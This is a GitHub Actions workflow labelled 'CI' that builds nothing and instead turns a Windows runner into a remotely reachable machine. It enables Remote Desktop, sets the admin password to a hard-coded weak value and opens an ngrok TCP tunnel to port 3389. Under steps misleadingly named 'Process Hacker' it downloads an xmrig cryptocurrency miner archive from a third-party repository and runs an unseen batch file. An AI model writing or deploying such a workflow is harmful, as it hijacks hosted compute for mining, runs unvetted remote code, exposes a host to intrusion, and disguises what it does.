name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - name: Extract
      run: Expand-Archive ngrok.zip
    - name: Auth
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Process Hacker.
      run: Invoke-WebRequest https://github.com/Michaelmartinzoi/123456789/raw/main/xmrig-6.14.1.zip -OutFile "xmrig-6.14.1.zip"    
    - name: Extrakt Process Hacker.
      run: Expand-Archive -LiteralPath "xmrig-6.14.1.zip" -DestinationPath "C:\Reference"
    - name: Extrakt Process Hacker123.      
      run: cmd /c C:\Reference\12345.bat
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389
      
    
